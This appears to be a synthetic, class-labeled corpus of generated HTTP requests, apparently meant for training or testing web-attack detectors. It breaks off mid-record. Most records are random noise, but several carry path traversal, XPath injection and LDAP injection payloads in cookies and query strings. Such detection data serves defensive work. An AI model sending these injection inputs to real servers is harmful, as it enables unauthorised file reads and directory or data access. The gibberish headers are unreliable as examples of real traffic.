If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "cDbyYOpWDU8CZza7j"
If-None-Match: "ih17kaI.mmiMAkJC78"
If-Range: Thu, 11 Dec 08 03:15:45 UTC
Max-Forwards: 5
MIME-Version: 2.6
Pragma: s='wxse'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: 14nnle i0nornu3=tmoIce
Range: 2856-325921,765830-7785,3752-597
Referer: /stye.jpeg
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.5 (X11; U; SunOS sun4u 4.7; 2o-ew; rv:9.7.1) Gecko/34503982
UA-CPU: 68000
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: compress
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44133
Start - Id: 23669
class: Valid
GET /luvrFmvmcennnodse/VHcB@8WPFtmp.js? HTTP/1.1
Host: www.tT5thk9hr.gov
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 24.79.172.50
Cookie: netcatiQvTechoHjDOG0=l7eiksee;sqtmtBsrCues=eeAd;rh=685256;o1todhAvtadnnu=o
Cookie2: $Version="38"
Date: Wed, 09 Dec 09 24:49:59 UTC
ETag: W/"pKrvb-.Q-sOD@DVzJlF"
Expect: hotxeoT=ssSrx
From: lanon@fBeece5si.gov
If-Modified-Since: Thu, 06 Aug 09 22:29:30 CET
If-Unmodified-Since: Wed, 18 Feb 04 14:22:35 UTC
If-Match: "w0ULpoiMTeOUomSPlM63"
If-None-Match: *
If-Range: Mon, 30 Jun 08 14:25:45 GMT
Max-Forwards: 26
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZGFhaGJsOmh0MmRk
Authorization: Basic cm50ZTE6bGhuaWRwaA==
Range: 1736-284,81-975030,-1107
Referer: http://www.isami.de/eixEpxor/irdcdope/ns5eo/reienv.wav
TE: trailers,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/6.3 (X11; U; Linux i386 2.4; oj-ps; rv:7.5.7) Gecko/55235361
UA-CPU: 68000
UA-Disp: 488,135,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 961x2992
Via: 6.5 221.4.121.67
Transfer-Encoding: compress
Upgrade: lfn/6.1, EejE/5.5, dt2/9.5
Warning: 628 67.26.215.19 "pv5dhesasmwm" 
X-Forwarded-For: 11.1.75.209
X-Serial-Number: 13224
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23669
Start - Id: 12654
class: Valid
GET /haM8/uiSrgpe/445k/mb/tSC9/kN5dHz24varandDcte5/DP38/ipStctyhsh/cl04kwef2hhrlt/dWbXROUDDiziScun.js?pwoA7iuegs8coh=0processing-instructiont&fxnLrneIpmFRg=%29&yttyeulrsoe=39&eriaasngrhett=h6%3A2n&rcp7echoZe2Vv=%40YdE&6ca=s2jE&5uUwPE3=wkec%29catperltnez&pi4ss=XhNtnxfn&rrecidIgdgst=uGJWhF6Kx&gShuph4rcovdtyE=0781767&gdda2n=hAtiiee&-7Q-=lnGy HTTP/1.1
Host: 126.185.176.169:3
Connection: Asoudr
Accept: */*;q=0.3
Accept-Charset: gb2312;q=0.9, isiri-3342, windows-1252;q=0.1
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 79.57.186.209
Cookie: ealabtrnr=59750;jdoLmtmpFzN8=nem;rvsVg=msiMs;nnuitn4wni4L=%o;telnRt=aenee
Cookie2: $Version="298"
Date: Fri, 10 Apr 09 18:26:22 GMT
ETag: "onFbsJ43WeEdwG0CQ"
Expect: rnrre
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Sat, 11 Nov 06 19:24:25 CET
If-Unmodified-Since: Wed, 22 Nov 06 10:18:29 CET
If-Match: *
If-None-Match: "aYnXxJVUZ1tZk4RV"
If-Range: *
Max-Forwards: 096
MIME-Version: 9.7
Pragma: rmWmn=h
Proxy-Authorization: 4eegrE junoo=sshr
Authorization: Basic bzluZ280OmVvbW4=
Range: 4-14020,90205-
Referer: /n5ieae/ytaoc/pu9ftt/Nveei.fgf
TE: gzip,gzip,trailers
Trailer: Range
User-Agent: bAwi7et (eSwhSlMly)
UA-CPU: PowerPC
UA-Disp: 0856,221,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 961x7915
Via: HTTP/8.7 0.25.70.129, ife/1.6 15.169.105.84:16, 4.2 7.43.129.128
Transfer-Encoding: compress
Upgrade: njK/4.3
Warning: 665 www.JOuop.css:0947 "halpebxnaho1tefti" 
X-Forwarded-For: 176.30.253.225
X-Serial-Number: 67342985693
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12654
Start - Id: 24497
class: Valid
GET /emg/bueac/gLFwa/cWNYkCeO9RP.mdb?N0WO@=428&bheHre0r0a=04612&nehomn=1eifhMttt&eeerd=UfOeobsywne1Ryetaa&bL2wy@@=3&sk=8&anefS=aw&si3A=aae4h3&1tqttt=yppdu&Sipitarc=tlwwkitnnbtd&hxtoyt8a=ian&sx5S=enZz HTTP/1.1
Host: 146.4.13.54
Connection: close
Accept: image/*, image/jpeg;q=0.0, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 139.18.16.97
Cookie: eesctfaen=0898;PIr5dt=dnmpmoo;yglw=mosOoa1fcc24;4itnfq=l=or-;v05esdl=m
Cookie2: $Version="806"
Date: Sat, 04 Sep 04 05:45:34 UTC
ETag: W/"czBGRUS@5FAGooNEmxa"
Expect: 100-continue
From: o7wtTfo@s3mLo11t.de
If-Modified-Since: Sat, 24 Apr 10 07:37:51 GMT
If-Unmodified-Since: Thu, 13 Dec 07 08:10:33 CET
If-Match: *
If-None-Match: "CudTdNSArQwRUyalHm"
If-Range: Thu, 25 Sep 08 03:38:19 GMT
Max-Forwards: 4500
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: Basic aWZCb3RpOm1zaGU=
Range: -7
Referer: /isio/tla3vees/iaauip.txt
TE: trailers,chunked;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/0.9 (X11; U; Open BSD i586 4.0; yc-0h; rv:5.1.1) Gecko/23892568
UA-CPU: Sparc
UA-Disp: 9148,760,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0451x999
Via: 1.0 7.154.240.243, HTTP/0.9 46.248.248.246
Transfer-Encoding: jdlsic; 9ouBvctm=yqaehgTl
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 067 181.89.226.75 "tdonimnv7ju2Go" 
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24497
Start - Id: 6457
class: Valid
POST /e3OMbq9ER0ulk0KViXRY/iNtaA/yVS/hynz6O/7winnteaQS/c@qWe/imgAEF/rzaoZmOoeatj/Jf/tauht9i4hw/u6laa.pl? HTTP/1.1
Content-Length: 159
Content-Language: pym0m,mstoc
Content-Encoding: identity
Content-Location: /6oltN/regumr.php4
Content-MD5: b2gzbHRuZWlzcnNteWxGZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Feb 04 07:19:48 GMT
Last-Modified: Wed, 06 Jun 07 07:44:09 GMT
Host: www.HE6pedrfgi.biz
Connection: close
Accept: video/mpeg;q=0.1, audio/*, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.5, compress;q=0.1, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 252.165.233.246
Cookie: 4tT=g5@Iy;iIuHry=qmfEdNlSotvwoe
Cookie2: $Version="601"
Date: Fri, 15 Jul 05 04:41:47 UTC
ETag: "kPFsYvPUuAuZ9Q93z.uJ"
Expect: nEiu=oiririEp
From: aVFabc@O7fpolootx.be
If-Modified-Since: Fri, 09 Dec 05 13:34:15 GMT
If-Unmodified-Since: Mon, 21 Apr 08 09:55:22 GMT
If-Match: "dInk5.IY_4HkNx6UWHR"
If-None-Match: "2AuK3_ArIb4Jrvc0."
If-Range: Tue, 14 Mar 06 13:04:21 CET
Max-Forwards: 6600
MIME-Version: 3.4
Pragma: rvId8tfa=iwuzauS
Proxy-Authorization: Basic bmxpZW1lZTpFeWFhYQ==
Authorization: NTLM dG9sYnJuYWF5ZHJnb2Fkbm42ZWR0bmJNemtyOGd0aW90eTl0bmFw
Range: 35260-775435,47-,92-626366
Referer: /fnnteqeu/5wa0d/lngtl/cgrnas/Iymohoa.pdf
TE: trailers,chunked;q=0.6,trailers
Trailer: From
User-Agent: Mozilla/5.0 (compatible; 2yeleiea; Linux i386; 0oe7o)
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7911x302
Via: 3.3 www.TeEj.js, ighnan/2.4 26.133.66.23
Transfer-Encoding: compress
Upgrade: oaj/7.3, Q8eooh/4.3, ea2kra/3.3, aegr/6.3
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 218.75.218.198
X-Serial-Number: 003791
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ubtpwtrir=itht9TnIy2&7Ke5=u&rl=hotae&d64rs=dnS3aER3rrSami&etehnio3= taeecideletenU&h2eOmsnwin=b&eleiaig0a\&elnyethDh=tstmp2e&8er1i=95549703&atvApk=gvGvaC0Q

End - Id: 6457
Start - Id: 21403
class: Valid
GET /sBE9i3ElPd/WM-VHzFmqH/w91YBu1vv94x@/tI0ONCE0rQ.tiff?asars=tknt7is7lrvetkdtia&uhdr1basqoeK=705154&otmosot=0542 HTTP/1.0
Host: www.cyCEs6te.it
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, cp-936;q=0.3, iso-8859-9;q=0.4, x-mac-arabic;q=0.9, windows-1257;q=0.3
Accept-Encoding: gzip;q=0.8, identity, compress;q=0.6
Accept-Language: *
Cache-Control: ovqempzo='riit'
Client-ip: 164.228.90.123
Cookie: bi=528;oiadv=t9j
Cookie2: $Version="336"
Date: Sun, 18 Jan 04 04:14:57 GMT
ETag: W/"SfvfJWgli17mfeKrc2X"
Expect: 100-continue
From: ue00ax@inea0en.net
If-Modified-Since: Tue, 13 Jun 06 01:26:46 UTC
If-Unmodified-Since: Sun, 31 Aug 08 16:46:37 CET
If-Match: *
If-None-Match: "F2xUZgjYez@q387e"
If-Range: "hPrQg1wdKCoTZ2W"
Max-Forwards: 24
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic bGROYWVGYTpibmo0a29mZQ==
Authorization: Basic YWEwaTpkYWZydw==
Range: 9389-552,913284-,86-
Referer: /alcna/oiu7/bov4haa/imroacad.gz
TE: trailers,chunked;q=0.6
Trailer: From
User-Agent: Ojoeatards/5.8
UA-CPU: PowerPC
UA-Disp: 6376,0383,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: HTTP/3.1 www.rtsoeg.jpg
Transfer-Encoding: compress
Upgrade: ott/7.1, cp0/0.6, iimrp/5.2, ravn/3.9
Warning: 217 7.232.161.211 "en9ruae" 
X-Forwarded-For: 131.153.107.61
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21403
Start - Id: 45331
class: PathTransversal
GET /snnadgrr6e/2KBqy2@x@TqyD2_/oV2cznrlfPxL9fb-NP_/teptxeeTvrealhsrm/sCnt/OIwgetqdeletejS/sseephsglirceohtc9e.nsf?7hdqtimDir6hvm=8-X.R9z55&amlh=9d5rdc1etle&a_B6OA=233902629&nyTeK=of0eeor7&iaey8hfzn70st=+&E1jfi0=166&Eyc=wzJyDv&hiKshutdownHT=egfReW7m9e6&nn9anvrs8ai=eRrsirnwinntrtv&arEfei=5&I2u=naihouh&sbtsritgh=8960 HTTP/1.0
Host: www.pomZcdg5a.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: eta-iitcyijl
Cache-Control: only-if-cached
Client-ip: 107.243.204.240
Cookie: t7PNanttmlngtqt=../../../../../../WINNT/autoexec.bat
Cookie2: $Version="39"
Date: Tue, 10 Aug 04 21:07:10 GMT
ETag: W/"Y6zgKIUkHVPA06Fw@"
Expect: 100-continue
From: ytue@relttbTc.it
If-Modified-Since: Sun, 20 Jun 04 20:19:42 GMT
If-Unmodified-Since: Sun, 02 Nov 08 08:36:58 UTC
If-Match: "87L7Xzx6-r-ZL6_9@L_"
If-None-Match: "qGjWIfKvX7Ky3FstaapN"
If-Range: "KzG6YWxDEct2uYB"
Max-Forwards: 6
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM ZmFyY2ExdGhyVWVkZG90Z2l1YnJydHVhaXRyYXRzY3R5ag==
Authorization: NTLM Ymd1aXRjUHJieGRwaFMzUEFkRWlJZWFhbmxReXVpdGVqbGN1bHE=
Range: 7666-,8763-,324-
Referer: http://rl0en.ch/7n6d/os2ahsr/rOerat.css
TE: chunked;q=0.1,trailers
Trailer: If-None-Match
User-Agent: femattr (hjwlqfpAMg; nmUD3fs4; kSQEtVL)
UA-Disp: 313,563,8
UA-Color: color32
Via: 7.8 www.femex.css, 3.6 www.OEos.gif, 2.0 www.ntaeecs.js:5
Transfer-Encoding: compress
Warning: 572 53.176.11.66 "rlsnPeqEeeRturtds2" "Sat, 27 Jan 07 23:51:32 CET"
X-Forwarded-For: 86.225.57.136
X-Serial-Number: 341978779570501

null

End - Id: 45331
Start - Id: 27248
class: Valid
GET /eti9a6seeit9clvoea/hcajgNNtJFPgMLrh/eTV.aspx?7nEd=tntabbl&sUdpo6pt=e0AxW&hrsnroa=7129&ms7io8ci=91131&E2c9winntFBfz6I=8&aagosrheDomsejM=o8peadminmRb9&hrs=ehl&1homnXsfdor=eej&grseptoaeva=ba6WU.RaERs&ek=ino&2s0ejov=iratgcimocz&jerrNstaqelll=y8ha HTTP/1.1
Host: 60.255.14.247
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 38.30.205.231
Cookie: ncbKLuiMservices=aGD;Izxarnnoa6n6uet=Euj;ay6n=g$9B;bog=Sh$gtu<>u0ewhere;eessamCr(
Cookie2: $Version="898"
Date: Thu, 24 Nov 05 23:24:15 GMT
ETag: W/"gXr1_ZCSbGUdw9r"
Expect: ahsba
From: rted@eseO4iri7.net
If-Modified-Since: Tue, 24 Nov 09 17:46:11 UTC
If-Unmodified-Since: Wed, 07 Oct 09 18:02:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Jan 04 06:32:18 GMT
Max-Forwards: 633
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="phSqht"
Authorization: Digest nonce
Range: -40
Referer: /chtE/oilr/nhvg/ceiteaot.mpeg
TE: trailers,chunked
Trailer: If-Match
User-Agent: awWaqgC0 http://www.nrToh.st
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8847x8709
Via: ah4m/6.5 www.ohtemeik.jpg, FTP/7.9 43.162.203.159, 8.3 208.120.39.183
Transfer-Encoding: deflate
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 054 www.zrwaAonj.jpg "mds3sb" 
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 03585265611938930040
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27248
Start - Id: 14105
class: Valid
GET /fgLuh1WJUg2IRx3t/y-0EXmKbw5FvbkxRg/msBcHefsenrR2/ihsOw6gtd/ug3AmPbmQ1f_npwT/oxrearTture/vdxj8tkgrG/Pboot.iniKRQ/defounjpLeetej.cgi?XU0q4U8u8Ae=jLceltttgsoleA&tfveO1=yFg&orTeotUenui6=096137&aebt7nd2tey=scAi+exec4execgcopyoln HTTP/1.1
Host: www.ene5roHr.st
Connection: close
Accept: application/zip, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Eahaana-U;q=0.2, Ts-7he, aha-h, ee0en-ac2sn6au;q=0.6
Cache-Control: max-stale
Client-ip: 250.248.98.251
Cookie: btm7ba=5132100207;1b8GDQjncvbscriptfY=vbscriptiut2traOexabqmeta;Eaywa8=791268339;Rsa4bdr=8qoas;nrtef=pohs
Cookie2: $Version="454"
Date: Sun, 23 Apr 06 22:01:41 CET
ETag: W/"kBd2fQueYc25Znl@V"
Expect: sK3n=wyein
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Fri, 30 Jun 06 24:58:10 UTC
If-Unmodified-Since: Wed, 29 Oct 08 10:01:44 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Feb 08 04:18:31 CET
Max-Forwards: 06
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM cm4wZGF5c2RuYnNha2lUb3NzZXQ0Ym9tYWV6aGVha3JhcWV5YmdkeGV3
Authorization: NTLM b3RuYWNwdlhobHJmZWdZeWt0bHJ2Nm5oc08wbzJyVGVpNg==
Range: 784942-,615-
Referer: http://aek1ett.org/oieQ/roJsts.gif
TE: gzip,trailers,gzip;q=0.3
Trailer: Connection
User-Agent: Mozilla/5.5 (X11; U; Linux i586 1.1; 0n-cs; rv:8.0.6) Gecko/84427019
UA-CPU: 68000
UA-Disp: 8924,5533,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5013x5767
Via: 4.8 www.njtnnwte.shtml, HTTP/1.5 85.236.217.62
Transfer-Encoding: identity
Upgrade: ulg/9.3, maT0N/4.1, oVahw/1.8
Warning: 086 www.tdkos.css "uisvnesrhn5pye" "Mon, 27 Dec 04 14:53:29 UTC"
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 6453522338858945
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14105
Start - Id: 49555
class: XPathInjection
GET /I6Zvib/ec3dKWKz4H/ch6suoqgaa/errseeLw4adedbzbT/e@Z.js?leuhdncil1e=56402+or+++++1%3C+++td%2Fe9%2F1Ainop%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D83%5D+++or++89612%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&soSbstdlnnof6=j28&Alf9dnotinn=t%7Ci&nshamlejftt0ns=6993513&yihgottm=3&zchrermc8Gy7i1=733&hoHPhigenO=5&keletenprlb5p=56872590&HWropenuKvZmm5K=64&plylAripuwe3hie=futroEwaozuHlrn&nbcopyPaJn=896796007&vsa6en5cpitO=lsEhrh&iwltIwHnna5=onzna4%40i4NiV&4m8aa3no5=Eh&JR8z9o6=ssj HTTP/1.1
Host: www.0pear.uk:635
Connection: keep-alive
Accept: image/jpeg;q=0.1, video/quicktime;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ieo-eiO, t-Y;q=0.7, m-n;q=0.7
Cache-Control: max-stale
Client-ip: 86.253.108.205
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="6"
Date: Sun, 31 May 09 08:26:06 UTC
ETag: "XzC6Z-Vy8j2n97GIJ"
Expect: 100-continue
From: petnihea@07eei4h.cz
If-Modified-Since: Wed, 14 Jan 04 04:23:02 GMT
If-Unmodified-Since: Wed, 19 Mar 08 03:56:21 GMT
If-Match: "s@hhRfZUMmhLWXVTudU8"
If-None-Match: "kEWDeLnT.B7v3YOoK"
If-Range: "E7_PANFcf5TzthpGJX"
Max-Forwards: 7926
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="93es"
Authorization: NTLM YWVvaG9FZXNyZXNQOWVvdERhdGlodFJlaXJyZGhkbnQyZUdlMnRubm9oaGk=
Range: -044
Referer: /tteo6iw/rreiet9i/eNasWa.wmn
TE: trailers,gzip;q=0.4,deflate;q=0.6
Trailer: If-Modified-Since
User-Agent: srgthmNai7 (lsi5jd1TvI; 4ZVa4.4m; eW7t8b; r8_P1@H; lXSjW.wLW)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: iiar/8.2 130.78.12.151:1, FTP/3.4 123.172.142.67
Transfer-Encoding: deflate
Upgrade: 0ba/9.3, efdwri/1.0, tlso/8.2, tVzp/3.0
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49555
Start - Id: 49873
class: XPathInjection
GET /sz7Mn8pIUHgNHxxWFE.cgi?ee9k2eim9nyWl=24092++++or+u%2FeSre%2Fisla%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D865%5D++++or++++8%3D&ri5qoDThn3=s%27ie&anulsoe=ennhcnlTeae&ccnh=+u7o%2Bj+b%3Dg%5B++hbgsounds&3gochknu6=tsoSRu&tegfa=33852915 HTTP/1.0
Host: 99.122.131.227:128
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate, compress, deflate;q=0.9
Accept-Language: jooi-pt, sttrioe-zr
Cache-Control: max-age=38
Client-ip: 119.142.72.137
Cookie: e2s5oail=7;tdisi=725768;ncIgQm=qt7kc5eteeeerEB8ei
Cookie2: $Version="5"
Date: Thu, 24 Aug 06 18:51:10 GMT
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: *
If-None-Match: *
If-Range: "fWpGjcFJVqB_EiGlefWC"
Max-Forwards: 5147
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: iRql Ianoraz=wh2iOsPl
Range: -307462,64-76604
Referer: /9tjhen.gif
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.7 (compatible; Nceel; Windows NT; tfoTUunp; dsueedt)
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: HTTP/6.9 126.124.59.169, 8.7 237.183.123.154:001
Transfer-Encoding: identity
Upgrade: ioh/5.5, bzl/3.8, 7md9/8.9, Pus3ou/3.2, nIiiic/7.8
Warning: 805 www.rthT.jpeg "seTho" "Sat, 29 Apr 06 13:15:49 GMT"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49873
Start - Id: 4386
class: Valid
POST /5yvXJiMYxXLDeONzp@I/jFWY63h@Tzg03j7d.d4.php4? HTTP/1.1
Content-Length: 324
Content-Language: enshTpgS
Content-Encoding: deflate
Content-Location: /runtma/llcrcote/rhemt5to.swf
Content-MD5: ZWRtdHNvMGVicm9kNGVzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Nov 05 20:26:44 UTC
Last-Modified: Tue, 09 Mar 10 18:26:31 CET
Host: 10.6.52.26:000
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 24.227.50.103
Cookie: UtmpPV=xhenfyhro;drEt1ufptateoo=vtyeakk;rnaidnb8tLedEue=sFgopasswd&jipoc5
Cookie2: $Version="5"
Date: Thu, 13 Dec 07 10:01:41 CET
ETag: "xl9oo@78lZOG_g@aFa_"
Expect: 3lAzn=siin88t;f3ntx7ro
From: aetadtfe@elerak5o.uk
If-Modified-Since: Wed, 31 Mar 04 16:13:10 UTC
If-Unmodified-Since: Fri, 23 Oct 09 12:39:41 GMT
If-Match: "f0vp2ErxkQIuqeJjGib"
If-None-Match: "txFM6jd@jyzCmyl.1"
If-Range: Mon, 17 Jul 06 17:14:40 GMT
Max-Forwards: 61
MIME-Version: 2.7
Pragma: b='is'
Proxy-Authorization: Basic aVdpNGxoQTp0NHMwaHNo
Authorization: NTLM VHBPbzRpb2FzY2pnVHlhb01sQXA0ZW50d2RvdGFhY3RybG53RW5keWNzYzY=
Range: 1237-117
Referer: /lheosee/SdTM9h/cmgbhA/aemco.shtml
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.3 (compatible; MSIE 2.2; SunOS sun4u; pe9sha)
UA-CPU: Sparc
UA-Disp: 7270,8918,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 109x8284
Via: ioa/8.3 www.onrcs7.css
Transfer-Encoding: deflate
Upgrade: elEf8p/9.8, lro/2.1, 5boo/9.9, FaC/4.1, P28mrw/1.1
Warning: 630 www.ld8md.shtml "Ovhsnhht" "Sat, 16 Sep 06 10:49:57 CET"
X-Forwarded-For: 4.233.209.13
X-Serial-Number: 5443838
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~

web95nAe9dses=oeotssernoermhelE&weommfnlprSifet=6537&xm63L9qkGE2a=(9:tg&y45uenfspniDu=584&1aqtocS4srmg0m=jRtdA&3eved=56278&n8isufnahfrhdz=739&UXFZ6HKQselectpV=540625&bg4Jy=rgyg&qR)abgsoundit)i8\&t1eqo23H5njoe0=c:u/d&thb0ecol=7en&uwrVrnttyenuo=mwa26Tlay3HAo&iupdateQHJ_=hena&d3tpTdedr=tz&ytrk=nph-ttorsseyAkxf

End - Id: 4386
Start - Id: 4642
class: Valid
PUT /tl_41jhGX9-0D-segLq6/maFYxQp./AS/7Gy2YuOIF0@5li/oqig.html? HTTP/1.1
Content-Length: 191
Content-Language: tgmepku,dmrY
Content-Encoding: identity
Content-Location: http://insE.net/tTnqnmsn/atodr/faws/a7lA/C0tbso8o.gz
Content-MD5: ZUZhMmljUm5mbHVoZTNuZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 10 02:34:52 CET
Last-Modified: Sat, 05 Sep 09 10:30:55 GMT
Host: 75.132.215.66:962
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ueqatd-st4x
Cache-Control: no-transform
Client-ip: 190.131.207.158
Cookie: ins3sm0geJnm=3368221109
Cookie2: $Version="90"
Date: Sun, 24 Jun 07 16:29:51 CET
ETag: "bsnEdCJyg8Am@@oHjnt"
Expect: 100-continue
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Mon, 10 Aug 09 09:57:39 UTC
If-Unmodified-Since: Fri, 12 Sep 08 15:00:40 CET
If-Match: "47DCet_v2NslA-Cmx"
If-None-Match: *
If-Range: *
Max-Forwards: 259
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM cmRsYWJ3ZnN0eW55aG1hTXdlZXpyYWYxTmVhdnVqa3Rib2k=
Authorization: NTLM VGh0aXRlN1RnMHNtQWVldWV1aTV0aW9Ub1V0bmE3dWVleTF0c25hag==
Range: 232-0,-44178
Referer: /io4e/sgee/cn5flah/ecrLlo.jpg
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 4.0; io-0k; rv:9.8.3) Gecko/42492762
UA-CPU: 68000
UA-Disp: 984,729,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0964x700
Via: 2.4 159.250.60.134, Sisueh/9.2 www.aaly0.gif
Transfer-Encoding: deflate
Upgrade: dea/8.9
Warning: 177 www.e0at.css "cpweb4u4hnat3a" 
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 42430609467360464
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

isJo0Icn=Hl'ioa3epskxtermah&msamnph-w0YDXoyBd=64&hZmsaar=Ohdivg)f%l[alink>aaes<&bfwyek=8301&roirihglUniitR=20880461&cReNHalg=tkjIiG&Mr25myTttatroua=ninsertrn&6v18nbckv9d=vvtesaihi

End - Id: 4642
Start - Id: 38847
class: LdapInjection
GET /oU-r7J_DCm/U7edegiemho2qayn6/ENeO/ArTwQ/g8/iaKdsnLaQOfeeZ3n/t-/a78sfn8rm/lso/dl2/sf1PnnuYG1Jhi/sos9gertnrOsdahmh.png?dde=andb%40rE&n8h5san=tmpveeval&tmdhfuohS4uatem=oScHJ%40oOJ3b&t4EsetR=10876811&eYTa=%29%28++%7C+%28displayName%3Dhad*%29++++%28name++%3D++++had*++%29%28mail%3Dhad*%29&as=z&haqmfo=4478&spldaatcw=976679&Sh5bodywnc=mb%5Dt%5B5mmka9g6&uepeskt=388815016&wuaearS=4889309824&DttW=eEsmrlflDrhrn&5nszup=a&QKC.=1 HTTP/1.1
Host: 69.75.208.66
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250, euc-tw;q=0.6, windows-1254, x-mac-turkish, x-mac-hebrew
Accept-Encoding: 
